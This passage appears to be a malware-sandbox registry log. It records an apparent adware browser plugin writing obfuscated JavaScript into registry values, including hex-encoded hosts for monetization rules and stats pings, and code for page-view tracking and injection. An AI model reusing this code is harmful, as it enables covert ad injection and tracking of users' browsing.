g[d]&&_0xbc3d[26]==typeof h[d]&&a[_0xbc3d[21]](g[d])?function(i,j){return function(){var k=this[_0xbc3d[27]];this[_0xbc3d[27]]=h[i];var l=j[_0xbc3d[24]](this,arguments);this[_0xbc3d[27]]=k;return l;};}(d,g[d]):g[d];}f[_0xbc3d[25]]=e;f[_0xbc3d[25]][_0xbc3d[28]]=f;f[_0xbc3d[6]]=arguments[_0xbc3d[29]];return f;};})($jquery_171);(function(a){appAPI[_0xbc3d[30]]=function(){var c,b=false;a(a[_0xbc3d[44]](arguments))[_0xbc3d[43]](function(g,f){var d=_0xbc3d[31];c=typeof(f)==_0xbc3d[32]?new RegExp(_0xbc3d[33]+f[_0xbc3d[35]](/^https?:\\/\\//,_0xbc3d[31])[_0xbc3d[35]](/\\\\/g,_0xbc3d[37])[_0xbc3d[35]](/\\./g,_0xbc3d[36])[_0xbc3d[35]](/\\*/g,_0xbc3d[34]),_0xbc3d[38]):f;if(typeof appAPI[_0xbc3d[40]][_0xbc3d[39]]!==_0xbc3d[41]){if(typeof appAPI[_0xbc3d[40]][_0xbc3d[39]][_0xbc3d[42]]===_0xbc3d[32]){d=appAPI[_0xbc3d[40]][_0xbc3d[39]][_0xbc3d[42]];}}else{try{d=document[_0xbc3d[39]][_0xbc3d[42]];}catch(h){}}if(c[_0xbc3d[21]](d)){b=true;}});return b;};})($jquery_171);appAPI[_0xbc3d[46]][_0xbc3d[45]]=function(a){(function(){a[_0xbc3d[48]][_0xbc3d[47]]=function(b){return this[_0xbc3d[43]](function(){var c=a(this)[_0xbc3d[52]](_0xbc3d[51])[_0xbc3d[50]](_0xbc3d[49])[0];a(this)[_0xbc3d[52]](_0xbc3d[51],c+_0xbc3d[49]+b);});};})();(function(){a[_0xbc3d[48]][_0xbc3d[53]]=function(c,b){return this[_0xbc3d[43]](function(){b=b!=undefined?appAPI[_0xbc3d[55]][_0xbc3d[54]](b):_0xbc3d[56];this[_0xbc3d[58]](_0xbc3d[57],b);if(a[_0xbc3d[60]][_0xbc3d[59]]){this[_0xbc3d[58]](_0xbc3d[61]+c,Math[_0xbc3d[62]]());}if(document[_0xbc3d[63]]){var d=document[_0xbc3d[63]](_0xbc3d[64]);d[_0xbc3d[65]](_0xbc3d[61]+c,true,false);this[_0xbc3d[66]](d);}});};})();(function(){a[_0xbc3d[48]][_0xbc3d[67]]=function(d,c){function b(e){var f;e=a(e);if(e[_0xbc3d[52]](_0xbc3d[57])!=_0xbc3d[56]){f=a[_0xbc3d[68]](e[_0xbc3d[52]](_0xbc3d[57]));return f;}else{return null;}}return this[_0xbc3d[43]](function(){if(typeof this[_0xbc3d[69]]!==_0xbc3d[41]){this[_0xbc3d[69]](_0xbc3d[70],a[_0xbc3d[75]](function(){if(event[_0xbc3d[71]]==_0xbc3d[61]+d){c[_0xbc3d[74]](this,a[_0xbc3d[73]][_0xbc3d[72]](event),b(this));}},this));}else{if(typeof this[_0xbc3d[76]]!==_0xbc3d[41]){this[_0xbc3d[76]](_0xbc3d[61]+d,a[_0xbc3d[75]](function(e){c[_0xbc3d[74]](this,a[_0xbc3d[73]][_0xbc3d[72]](e),b(this));},this),false);}}});};})();};appAPI[_0xbc3d[46]][_0xbc3d[45]]($jquery_171);\n" Bodprv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110611331111}\TypeLib\ = "{44444444-4444-4444-4444-440644334411}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software Bodprv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\NumMethods\ = "10" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachineFallback GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\ProxyStubClsid32 GoogleUpdate.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\91\JavaScript = "\n(function(K){var y=[].slice;var x={};var a=function(ap){if(typeof ap==\"string\"&&typeof ap.trim==\"function\"){return ap.trim();}return ap==null?\"\":ap.toString().replace(/^\\s+/,\"\").replace(/\\s+$/,\"\");};function f(ap){var aq=x[ap]={},ar,at;ap=ap.split(/\\s+/);for(ar=0,at=ap.length;ar<at;ar++){aq[ap[ar]]=true;}return aq;}var F=function(ap,aq){var at=[];for(var ar=0;ar<ap.length;ar++){if(ar in ap){var au=aq(ap[ar],ar,ap);if(au!=null){at.push(au);}}}return at;};var ab=function(at,aw,ar){var aq,au=0,av=at.length,ap=av===undefined||appAPI.utils.isFunction(at);if(ar){if(ap){for(aq in at){if(aw.apply(at[aq],ar)===false){break;}}}else{for(;au<av;){if(aw.apply(at[au++],ar)===false){break;}}}}else{if(ap){for(aq in at){if(aw.call(at[aq],aq,at[aq])===false){break;}}}else{for(;au<av;){if(aw.call(at[au],au,at[au++])===false){break;}}}}return at;};var H=function(ar){ar=ar?(x[ar]||f(ar)):{};var ax=[],ay=[],at,au,aq,av,aw,aA=function(aB){var aC,aF,aE,aD,aG;for(aC=0,aF=aB.length;aC<aF;aC++){aE=aB[aC];aD=appAPI.utils.isArray(aE)?\"array\":(appAPI.utils.isFunction(aE)?\"function\":\"\");if(aD===\"array\"){aA(aE);}else{if(aD===\"function\"){if(!ar.unique||!az.has(aE)){ax.push(aE);}}}}},ap=function(aC,aB){aB=aB||[];at=!ar.memory||[aC,aB];au=true;aw=aq||0;aq=0;av=ax.length;for(;ax&&aw<av;aw++){if(ax[aw].apply(aC,aB)===false&&ar.stopOnFalse){at=true;break;}}au=false;if(ax){if(!ar.once){if(ay&&ay.length){at=ay.shift();az.fireWith(at[0],at[1]);}}else{if(at===true){az.disable();}else{ax=[];}}}},az={add:function(){if(ax){var aB=ax.length;aA(arguments);if(au){av=ax.length;}else{if(at&&at!==true){aq=aB;ap(at[0],at[1]);}}}return this;},remove:function(){if(ax){var aB=arguments,aD=0,aE=aB.length;for(;aD<aE;aD++){for(var aC=0;aC<ax.length;aC++){if(aB[aD]===ax[aC]){if(au){if(aC<=av){av--;if(aC<=aw){aw--;}}}ax.splice(aC--,1);if(ar.unique){break;}}}}}return this;},has:function(aC){if(ax){var aB=0,aD=ax.length;for(;aB<aD;aB++){if(aC===ax[aB]){return true;}}}return false;},empty:function(){ax=[];return this;},disable:function(){ax=ay=at=undefined;return this;},disabled:function(){return !ax;},lock:function(){ay=undefined;if(!at||at===true){az.disable();}return this;},locked:function(){return !ay;},fireWith:function(aC,aB){if(ay){if(au){if(!ar.once){ay.push([aC,aB]);}}else{if(!(ar.once&&at)){ap(aC,aB);}}}return this;},fire:function(){az.fireWith(this,arguments);return this;},fired:function(){return !!at;}};return az;};var j=function(au){var at=H(\"once memory\"),ar=H(\"once memory\"),aq=H(\"memory\"),ap=\"pending\",aw={resolve:at,reject:ar,notify:aq},ay={done:at.add,fail:ar.add,progress:aq.add,state:function(){return ap;},isResolved:at.fired,isRejected:ar.fired,then:function(aA,az,aB){ax.done(aA).fail(az).progress(aB);return this;},always:function(){ax.done.apply(ax,arguments).fail.apply(ax,arguments);return this;},pipe:function(aB,aA,az){return j(function(aC){ab({done:[aB,\"resolve\"],fail:[aA,\"reject\"],progress:[az,\"notify\"]},function(aE,aH){var aD=aH[0],aG=aH[1],aF;if(appAPI.utils.isFunction(aD)){ax[aE](function(){aF=aD.apply(this,arguments);if(aF&&appAPI.utils.isFunction(aF.promise)){aF.promise().then(aC.resolve,aC.reject,aC.notify);}else{aC[aG+\"With\"](this===ax?aC:this,[aF]);}});}else{ax[aE](aC[aG]);}});}).promise();},promise:function(aA){if(aA==null){aA=ay;}else{for(var az in ay){aA[az]=ay[az];}}return aA;}},ax=ay.promise({}),av;for(av in aw){ax[av]=aw[av].fire;ax[av+\"With\"]=aw[av].fireWith;}ax.done(function(){ap=\"resolved\";},ar.disable,aq.lock).fail(function(){ap=\"rejected\";},at.disable,aq.lock);if(au){au.call(ax,ax);}return ax;};var N=function(aw){var at=y.call(arguments,0),aq=0,ap=at.length,ax=new Array(ap),ar=ap,au=ap,ay=ap<=1&&aw&&appAPI.utils.isFunction(aw.promise)?aw:j(),aA=ay.promise();function az(aB){return function(aC){at[aB]=arguments.length>1?y.call(arguments,0):aC;if(!(--ar)){ay.resolveWith(ay,at);}};}function av(aB){return function(aC){ax[aB]=arguments.length>1?y.call(arguments,0):aC;ay.notifyWith(aA,ax);};}if(ap>1){for(;aq<ap;aq++){if(at[aq]&&at[aq].promise&&appAPI.utils.isFunction(at[aq].promise)){at[aq].promise().then(az(aq),ay.reject,av(aq));}else{--ar;}}if(!ar){ay.resolveWith(ay,at);}}else{if(ay!==aw){ay.resolveWith(ay,ap?[aw]:[]);}}return aA;};var ai=function(aq,ar,ap){return appAPI.utils.indexOf(ar,aq,ap);};var U=function(ap){return ap&&typeof ap===\"object\"&&\"setInterval\" in ap;};var V=function(au,ar){var at=au.length,aq=0;if(typeof ar.length===\"number\"){for(var ap=ar.length;aq<ap;aq++){au[at++]=ar[aq];}}else{while(ar[aq]!==undefined){au[at++]=ar[aq++];}}au.length=at;return au;};var t=function(ar,aq){var ap=aq||[];if(ar!=null){if(ar.length==null||appAPI.utils.isString(ar)||appAPI.utils.isFunction(ar)||U(ar)){push.call(ap,ar);}else{V(ap,ar);}}return ap;};(function(){if(appAPI.isBackground){return;}appAPI.isMatchPages=function(){var aq,ap=false;ab(t(arguments),function(ar,at){var av=\"\";aq=typeof(at)==\"string\"?new RegExp(\"^http.?\\\\:\\\\/\\\\/(?:www\\\\.)?\"+at.replace(/^https?:\\/\\//,\"\").replace(/\\\\/g,\"\\\\\\\\\").replace(/\\./g,\"\\\\.\").replace(/\\*/g,\".*\"),\"i\"):at;if(typeof appAPI.dom.location!==\"undefined\"){if(typeof appAPI.dom.location.href===\"string\"){av=appAPI.dom.location.href;}}else{try{av=document.location.href;}catch(au){}}if(aq.test(av)){ap=true;}});return ap;};})();var M=\"09-21\";if(!appAPI.isBackground&&appAPI.dom&&appAPI.dom.isIframe()){return;}var ag=appAPI.utils.MD5;if(!ag||!ag.encode){ag={};ag.encode=function(ap){return ap;};}if(typeof appAPI.internal.monetization===\"undefined\"){appAPI.internal.monetization={};}var an=appAPI.utils;var W={ie:\"10\",te:\"19\",ch:\"20\",to:\"26\",sb:\"27\",op:\"28\",tc:\"29\",ff:\"30\",tf:\"39\",sf:\"40\",nv:\"50\",mx:\"60\"};var O={DBNamespace:\"monetization_plugin_\",RULS_JSON_NAMESPACE:\" rules_\",MONETIZATION_PLUGINS_IDS:\"monetization_plugins_ids\",IS_INSTALL_REPORTED:\"is_install_reported_\",STATS_NAMESPACE:\"stats_\",PLUGINS_VERSION:\"plugins_version_\",GEO_URL:\"http://ipgeoapi.com/\",BASE_DATE:new Date(2013,0,1),updateInterval:1000*60*60*6,rulesJsonHostUrl:[\"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\",\"\\x61\\x70\\x70\\x2e\\x6e\\x65\\x77\",\"\\x69\\x6e\\x66\\x6f\\x63\\x6c\\x69\",\"\\x65\\x6e\\x74\\x73\\x74\\x61\\x63\",\"\\x6b\\x2e\\x63\\x6f\\x6d\"].join(\"\")+\"/monetization_campaigns/\",statsHostUrl:[\"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6c\\x6f\\x67\\x73\\x2e\",\"\\x6e\\x65\\x77\\x69\\x6e\\x66\\x6f\\x63\\x6c\\x69\\x65\\x6e\",\"\\x74\\x73\\x74\\x61\\x63\\x6b\\x2e\\x63\\x6f\\x6d\"].join(\"\")+\"/monetization.gif?\",errorHostUrl:[\"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x65\\x72\\x72\\x6f\\x72\\x73\\x2e\\x6e\\x65\\x77\\x69\\x6e\",\"\\x66\\x6f\\x63\\x6c\\x69\\x65\\x6e\\x74\\x73\\x74\\x61\\x63\\x6b\\x2e\\x63\\x6f\\x6d\"].join(\"\")+\"/monetization-error.gif?\",countryName:\"\",reportQueryString:\"\",subID:\"000000000000000000\",reportEvents:{installEventId:0,dailyEventId:1,vertical:2,runningPlugins:6,installVertical:13,impressionsEventId:31,newAllowedVertical:32,revMocaEnabled:35,policyAppDefualtInstallEventId:50,policyAppDefualtDailyEventId:51},advancedUserBlackListPlugins:[185,188],MIN_PAGE_VIEW:(appAPI&&appAPI.internal&&appAPI.internal.isNova?-1:50),MAX_IMPRESSIONS_TO_SEND_IN_PING:200,MAX_PAGE_VIEWS_TO_INJECT_BI_PIXEL:200,PAGE_VIEW:\"monetization_page_view\",pageViewCount:0,PLUGINS_DELAY:\"monetization_plugins_delay\",installationTime:appAPI.installer.getUnixTime()*1000,hoursToMilisec:60*60*1000,DEFUALT_SOURCE_ID:0,categories:{\"1\":[\"d908e50170d7cb46a92fdbff0d73bb5d\",\"0a64c81275732dcf0eb51fc0fdecfaa7\",\"edb18644366c10cc24c58f6fb14ca9f4\",\"15e39ed909ac8e17ae3cc3c91cd7ae9f\",\"dccefc9affe37ba60b49d0a4789ce042\",\"55a7d0f3833487778c3bdff8b2096e93\",\"0212ae9fc1eeb53f9f641335b804d75e\",\"d5e783fe22abe91aae7179d10a958497\",\"9c8a818246bc677ef54725340e9c5a98\",\"6871592501ed31709e241750c4363fce\",\"1c5e3f677b22b8257c1df15a70e7df26\",\"daf4c4488123ddadb30a7adaadb18b54\",\"11fbd0aa23a016619379552c438b081a\",\"fcaed5b82116cd700a0949772ad8ff49\",\"6ac10c5f77cf4309c731a1edca41f357\",\"5c83bc2a9fe11b248ee7a0577c7d8fdd\",\"b4724ce8e3ac8d971ea648c70f1f3a28\",\"5cfdb867e96374c7883b31d6928cc4cb\",\"5bc25469aea12b844db6b49146c3e0ed\",\"15830c2f3218394a63d70b23d235cc1c\",\"7f5e73ea77ef99619089c3857dafdcb4\",\"029c1c42a9160c3cf3db1a687f11ff72\",\"e84400c002083678aa69041045895fae\",\"da0239e7da0330fb26ef37dd1d940044\",\"993439d6f7a4548cae1381c9073cbee1\",\"24414caa6316a5694f77499fa604e5b1\",\"340d70f50a7a4507bc874c8108bb45bc\",\"2e44b2f1bf1b2b87d2be9f94ad2a2a35\",\"5484845885ffd608ebb0ad1ac39434d4\",\"96eb5194f361b233bf8fb9a80267f1de\",\"91e4f116b8a4f5258b982d3c10910bdf\",\"5638298177fc6af5190590244d6d8035\",\"7712b7ac7ec5d5966fb35b1425d0283f\",\"1080cee006e84c91858613ce7dde99fb\",\"428d0f3d623a15db6cacb689e86b4352\",\"8b25ca5c09e10312a1567fb3d7f82c07\",\"84dcb17eaafb9d32908759a607838c8b\",\"fcbed3a6b1e592c8efddf3f925b26b7f\",\"7eae142b683afcf5aee231291c679877\",\"9bcd814058bcf8f6497f0495e0a2fd71\",\"6bb8719fca4581212b3aa47da8755163\",\"adb2121658b69c9a701f270c8faba02f\",\"5694f231cd01d8222d59557c56cef9a7\",\"b7444e183caecfafbc083b01ac3b807f\",\"a7004282e7067fe073c99143415a62df\",\"75061a1f0c82f0f1baefee188478ed1b\",\"7e184fc24f5050abd21b2c6243df3a12\",\"4d1bdc23c5d49f2b5348b4d204776ebd\",\"6f9304b76556b918e7689b49233ea133\",\"9786652fec772cd9bfef720283da5d6a\",\"01bb6f8040640453d2bc9070ec620993\",\"237a4a166d93b46dcdd3abd285efd1d6\",\"06bec2811b138d6a9cf42dcfecfd42ce\",\"4cb50af38589bbb19f348983b678001e\",\"e9a2f50ff9e05ca83dfcf1502e118696\",\"357d9095a866605243d674a4f3106179\",\"3aaafa62954e4babf8db469344db3dfc\",\"da25b0e1d883ac63dbb72560aa315606\",\"3066962d891e0c6e119697ae1dcf13a5\",\"4711d4c71b93bb3c47ed1128fb541cc4\",\"dac440339a2965b7eca2546dcb36d6b7\",\"52acea241dc9383e17cf0d0ccb0bc278\",\"f151ee9ab3003bd4186849cb69779326\",\"89e55d4f580dd044088b9a003110b37a\",\"9e75d000ea21122cfcb747105bd1daf8\",\"1451eff4384f083524051ee2696b49ac\",\"d1d83b46c34e546d582102f66103e99b\",\"ad1fe84a23ac2a3d83c1d64f602d49e7\",\"2a7b33d11c2910114797dde0cab5fc34\",\"b5d69e59a048e0b5337d9ee71e5c7876\",\"73f5305614375cb15a3279d7003befa3\",\"2c383062328b7897878c2548bd00be54\",\"e41e3b6ff9906a18b358c8beaff745f3\",\"b48789ebdc5aae08cd1065712685af97\",\"cdd888a76665e83f1ea37da24002486b\",\"840bfbd391545b58dc45740c583dd40f\",\"68474bccd77385d9f625abf45ab56f2b\",\"3c3662bcb661d6de679c636744c66b62\",\"1518a63e3cf66be91d3f392ce39c8cfa\",\"8e137f109d4a2818bda650c5a770be57\",\"ec565413ae6e986d2ef40b6679e1e638\",\"70294ed8222b491fb4e0920689dc7895\",\"c7d33d7e3e0919b97455ab4a60785e2a\",\"ac837973c3648dd268f71246d9410865\",\"cc6af1446fc1e4074fe31e8afe000fe0\",\"c7bf8de669d196501187e13733085c11\",\"dbb88a6eab427f1e258ab0cea833eda8\",\"eddd9ad5e56ce3607d0b8d7655db5de7\",\"77140fa536e038f17579701236eaf6d3\",\"c63661247ee0dc906018ee337c0ae04d\",\"5f22caf6994b0c6b1a02cb972d8db01f\",\"b228c5c1ebb8f65d5b233dd1ace0e4de\",\"04ed17c7cbd545a609bf85e8df1de83a\",\"7b83d3f08fa392b79e3f553b585971cd\",\"0f6784e8964bfe8bb43990fcdf688218\",\"c5b68fcfbacadcc5301cf42c5d1cdcf0\",\"074b6b215c8acc237f7510bdbc3a1b3c\",\"eae15abf680bc48637a296e45810429a\",\"f0644eebb46223043280489446d292f1\",\"ec9def32167280ea5e81aa1d79d47dde\",\"b8579f2f0373ac24583b0a1a2a9be213\",\"de788dcf1e1598f1eb8470fabcdcde8e\",\"837b4bd97b308a69aab3fd919ae53c5d\",\"dbc441a59f98b4b57fc7c76dc8820606\",\"8afd6e07dd8bb4d29af7de48282244c0\",\"c8cca2151a97c60c47dafa3768966b83\"],\"2\":[\"741de45c9e6b64390d2e35375f0f8581\",\"ee8534b3636068485d7d708e20cf174e\",\"6fe1e037b4cf190a66924e3f44e6d0ec\",\"544e1a3aa40f73fa4d93956e2ea53bb2\",\"0f9669a29b2b67973ef3696e71c75427\",\"200b0376dcd63be3b18a5e00000cf7fc\",\"cb7edf1f19372867b0a2e80d80b4137f\",\"d94f48c775f1af4020c2f483b06d285b\",\"dce09f281c35f49c2f58ea7580b530b7\",\"80d2fa06da467c39027af74ff418760d\",\"0243280c4476a88524bca7c8955863fc\",\"d13a661162ccf33e59f2d5aed8ad9c44\",\"4d25fce69729e4cb818bb2de8a37b0aa\",\"de0da3fa4cb5d4b24852a4f817ebd131\",\"67392b74ac6286e81e741628c034dc0b\",\"527ab7e992537931a0ceb32747919fa5\",\"2ec0fb85b8eef1f31332d1c78ac0aa1d\",\"71d9a1732bb8e53dfb62280259241dfb\",\"dc7766c5dba49e1ddbff2f8e5ea8d4dc\",\"8de225e42c4dd1e6c8be7e7876a15635\",\"c44550f84ce23a0adcf5ab76edb34bbe\",\"758e96b8fe9b11d8a8b7258a994763bc\",\"0adbfbcf3e393b352be3e17cd7c4df8c\",\"5feed20553d1b86a35accc1b9e347319\",\"3fc71c0d7da4697d701b106be72e3c4a\",\"a55d72607f118317c7d4e7abaa7703f1\",\"2609eaea1a4cc99d2270d7512c3d5fa8\",\"a28e4b4a68bfe39ecacedf2a8186a374\",\"39ded848393e462d45d85993abc108c9\",\"cf1f658d15ba868bb8aae2eae98ddb3e\",\"16fe03771c9e306cdda4ce3255a921e6\",\"f9c9da136785e708f779283fdf99b7df\",\"9c5c6fb93e96ca94306614ce810bd41d\",\"f21f0be22075385fb1fd44fb4980c7c1\",\"b5c0b187fe309af0f4d35982fd961d7e\",\"cdb47233b6b261d9f61d4cc1a5d2bff7\",\"e99f6c806b22ac36e635f49ad0e0d5e1\",\"ba9a4ef31477dab241685003a454a9b8\",\"e3cc92c14a5e6dd1a7d94b6ff634d7fc\",\"b3169b92be61796be592cfdabdd995b9\",\"ddecb74a4e04ebbced90e90198bae234\",\"1388f1b1c86f0da26d1d8d2b26e3a9a5\",\"1f384ba679fb77c37276815566fa4d07\",\"a0ef4d127dfebb7dc7b9e0e3641e59fc\",\"23f474aef895fa9f10b9e5bb5ab804d5\",\"3a1a3d30cf63cef071e9c4b30147eadb\",\"5319c50c141d6f8473631b89c06b81b5\",\"dd129413d1f58c6dc6ab928179479ef2\",\"74d18cd891d40515b9249eea0b2ff87a\",\"8b0a44048f58988b486bdd0d245b22a8\",\"81473c4e044b5380ee37025921c5a58c\",\"b2d4865a0f8ac21aaed67807e059a547\",\"c20b082efdd04af2d548eeb8aed71ca7\",\"2e8d4fedbba9b86eefec01941de3627e\",\"99fe630c8024c39d597fcfc60b830510\",\"7156826f0042fd28ac348e1f0f033b86\",\"f4b97c0793ac4f6175740d4d67fd1c2a\",\"c3bc40be5a69a7586b3e5d5d5c12e2ac\",\"4248ca9feffad878d5494b264f32fa67\",\"b23e50e5a8769e2f770a21fe12d4a014\",\"f2a08a3b5a00618ff0a25a53bb9ce46f\",\"d492377df70a81fbf2467c929403d0bd\",\"b70f38792a7cdaf48e26f03bd5125539\"],\"3\":[\"989ca2bdd8595205dd7ed633dc648ada\",\"043167b2443a3009ba6b120883ea4f4e\",\"d82c8d1619ad8176d665453cfb2e55f0\",\"ebed2b72dc9f9f860648bdf933150755\",\"0ea6000706fa80895c6e4ae23b581fc8\",\"bfb8482ec924b3e6eead117925c00a3d\",\"cd9e2f9940ee46fed50902be0ae7fddf\",\"5b7ab9d1d4c1ccb3b52e1b7b467f48d4\",\"327ea51ec7be0541da89b90c9cc93b43\",\"c66b944da4afd0b6554c05359bbddf08\",\"2b5655010835141f4c8790bf29290668\",\"811d6697238feb092ee1332de0558987\",\"415eaa2d775954fb17ed7a163e9734ff\",\"f8e6d349d3a91ffda622ac1b9a8022cb\",\"11a32a05ee75b315bc7e28a5f681e333\",\"fa42b816950b79e3c969c637657845ad\",\"2ad733df56aaafa5650bafc9c98c6ffb\",\"8b02b445d416b1baaa7b7c016b982fd0\",\"86aee07873323fa5affe893960852849\",\"e9bbc21e7f23d5a44e1951d4669b15a5\",\"f0d89c0a5fe6e7ceed5843d90cf261ef\",\"88e1e1ca208e047be09ac68302716180\",\"71d165bce41058008e33aa48fd4e2dbd\",\"6385d20782d99ae111924bc1c5d3b9e2\",\"77b7c0ffd707bf69ced550474c165552\",\"2870bd79798876eadb6b59248fb02f61\",\"8d5f9196cab04b0acc736b0b2fe74843\",\"3a87a63c3850d909ede9ffa1f9d2eba5\",\"92f8309148f570170c96452874545292\",\"e2dce04bc495521a8300c1d1ff78bc2d\",\"4490776dd1c3d168df94377860c39f5f\",\"e115339d14cb677ab570f0f1016ec3d8\",\"2cd483fd282f6b44f9804f764806aa0f\",\"2da30945e2e656fecd5b800c19eb05b2\",\"fdaef81a51689e976f85549813e5f482\",\"775c9503be227a53595895904646f1cd\",\"0be923adc1c42ebed775e3cff75225d6\",\"7091ac13b9b9f6252111a5dd873e9989\",\"d3ffe21c3bd9d6de047b92af2044fafa\",\"df6aa928b84ee6409dd46f50f053964e\",\"4794e7fc7ac56cb98aec7d95003dc093\",\"b29904b550a356faaf3600d7925a609c\",\"ba7e9648324092f5439fa5c876a7a9ca\",\"394495c357304bd4ec81c6d1abd18a7c\",\"5c153b219ab9ab16e677b5929d38b26a\",\"e2f1aa2fb45c372ed20b02f61f7a7e4b\",\"1fb752cba25d10ba54780a92ae1238fa\",\"68027d94ade40e13fc09f1c50156e3ee\",\"e835dad18e891299917a4dfb9a2a8cd1\",\"3eb26ea9fcfbdb4e68d1a3144716ce05\",\"5b26b1cd4a6585e367398c7f26aa3653\",\"743c971c144fcfd2c075dc47fd3986c1\",\"95d952dc2dba146c60949ee0a4b72142\",\"2d80ab9b91c6d76e343569d4be599498\",\"8841ed564fa9623657b74e86827ccc50\",\"e038faee9adb6d3f542fab958911245d\",\"44ed5c95b4f5d58d5f8471c9dbdfb8b7\",\"2c72c33e77d18ebd675e73d624d1a922\",\"3318c203f3423f5bf4fe0bd48c01ade1\",\"0bf864d0af8a6bcf5a18af279405b7db\",\"dab053d1f76bd1e2dbff6900e46c88e6\",\"21ad0bd836b90d08f4cf640b4c298e7c\",\"72bbaa53b3296b3821e5225e8f7e9327\",\"029c2aa336dcc9c402e693086e5fb0ca\",\"c9203569e9f6e769dfc999cad2894987\",\"f035805064f7eba0de386f6585db1bea\",\"c8cdc80fe3f8a20a79505b36ee9e89d4\",\"8cb9efb2ba9429ccb928d010e58e21e2\",\"92fae19b08d716fb22bb69eba6839b55\",\"a21ad55c489cf23594e9456876dd1d30\",\"449f72b4f3b4c4734327e83f632e7ef9\",\"93cad2be0ccbb23cc570cfc0d5fda7ce\",\"810dc6911c825b55eff684098f2beb19\",\"0c627e29c77502cc3a437c32a315c9ec\",\"1e57b7f7e95ba20c99a5887d2172f753\",\"5c199234210e910129d3913b58bdc9d8\",\"c1abd97d40c50d5f1bbce15f3f202e19\",\"e2025d89950c10cae34b091bfeb7589b\",\"4375cdf89e0d76fa6700a75b2226116d\",\"9f18457d02558aecc24015b657364a70\",\"1a5910537952f46b065e3d15eb4aa354\",\"bd49ed92726e606c85887a55e3a7454f\",\"94931e4a3036baeecdacb975e10a8ec6\",\"34e27eff219c716819f2e17bfe48b9a3\",\"fabcaa97871555b68aa095335975e613\",\"295b16ee0c64a0ea458f0b421fb69772\",\"20d49254c0d8c21887d47b81665c0422\",\"ee7c267a30984c940d3c7a3e39c161bf\",\"3de5394f33613962aa329d3c2420caa0\",\"425eb11ca806e05da32747cd4f5aa0da\",\"eb78c2829df844c8d52d13f7c0ae4ad9\",\"2a7606928c03cdff6318022202d8c3d8\",\"a3cb966624ac67ed7d8e77c0f39ba36f\",\"e081253b0d6591c0bd041da1df47c013\",\"b56be107e02f16a1557fe6b820c07fff\",\"a6260c541685d4e043855553ce2adc53\",\"31b176f5f6deb46651120413600b02b2\",\"cd8e7918010a87cc619849e00265c9a6\",\"3df2d1cd8577d51a6682434f32fb5522\",\"8ceca192c53e03474da2715d74e9ac6a\",\"87c225cf0ef858082c1e638eae0cce66\",\"927d53e08cf11a79310cf95ecebfe8cf\",\"028f83c90ef9f50c06d88cf660f9eca9\",\"f18df0996f4a2ce4365c0873ed2c90d3\",\"91822a0a6f12066f25d7a5f482076c19\",\"c2833b5465c0ad3b4b0d28c739611c61\",\"98fd6fb553b92c17221e34c536066f96\",\"4e40f1e5e85c99bdd50c4cff84838347\",\"62161fdbbf0ff15d623e9dea79260a04\",\"17c6cdfa9240e3ca5f6e9dd2ef3d0441\",\"25445b7ba938d070900b06cf15c0e7f5\",\"ee427e0adc4e99b7b6e531d337d48428\",\"fdb68982260cccd99163124f5b66bdac\",\"6a37836b4cd8d9538ca0878d15478b98\",\"8eab308b88cf1ffed8e13d74475d7675\",\"e1dcab7e579aa227becca4cad76d6c11\",\"d638f5426549669d80d9d62fcd754f54\",\"a2470904929c4a18917038c2ee790e2a\",\"a74f7d471e7a30121b2e763cf8938d2c\",\"563d631c6240f2d29772a9868aca88dc\",\"6c06464748ce81187789289bdea31246\",\"1fc5a1326ae4aec7c813fede978ec85d\",\"4905743c2cbf42c3526f6081b3540eda\",\"85afaab5f3b6a638269e33d12da2fedf\",\"a6c24068b7ed013e144952095e30bb2a\",\"441c970916844a087c06d7f74631a888\",\"79bd2b6b389ee211aaf26e9ea3a1292e\",\"52c6b50c2697b9a99cd00375afcdf056\",\"0292713f3bd713d65a596de9a449155f\",\"2cfe1d7fb53aa07f7c177fa5d9f7b9bd\",\"c6b50fa27a8c5f9a00e968ace1da7df7\",\"a8abeb68d2492961e2cb2e580268057f\",\"b813dbef4ec93694c146303b8dd29a9c\",\"e313e0a207d98c73dc33a93fd850f9ec\",\"2f3f3238f9a5783fe4767d77e53aaf3b\",\"712e5d9c46784262937bc4b2215c3beb\",\"590e82da54f034bfe08281db1c5018bb\",\"457d7d7cd3cd82d66ba00fc48f756260\",\"4253f205b86cc1f808ea47016f6848d7\",\"577da7fee6e9ff57afc5f23882acdf54\",\"57336afd1f4b40dfd9f5731e35302fe5\",\"425541061c853a600be11b6c14dd7ceb\",\"9799751211aea27a7f0caad23aa057b4\",\"ed0f77e2038fb7e85f352e06ea47e2fe\",\"8b40b8d09ff7a478d892aa6742f23497\",\"99de93edb9b02d15fbea980845e73621\",\"f57d5a4bb0531ba1b70040adacdbca8c\",\"f541bcb6ec62de093416a7c8de510e84\",\"dd7b696b96434d2bf07b34f9c125d51d\",\"2be987e67d0e412de7e5cbb83e179938\",\"d741b459547e8f53ea31b3fedcb70efe\",\"49af3b640275c9b552a5f3f3d96a6062\",\"fb820bf1b2784a5e2b4ab152d89d6739\",\"c3c20e2d371b2cfea1bbd80d1d474cd6\",\"ad346c998825f858382f631d74c200f6" Bodprv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\ProxyStubClsid32 GoogleUpdate.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv 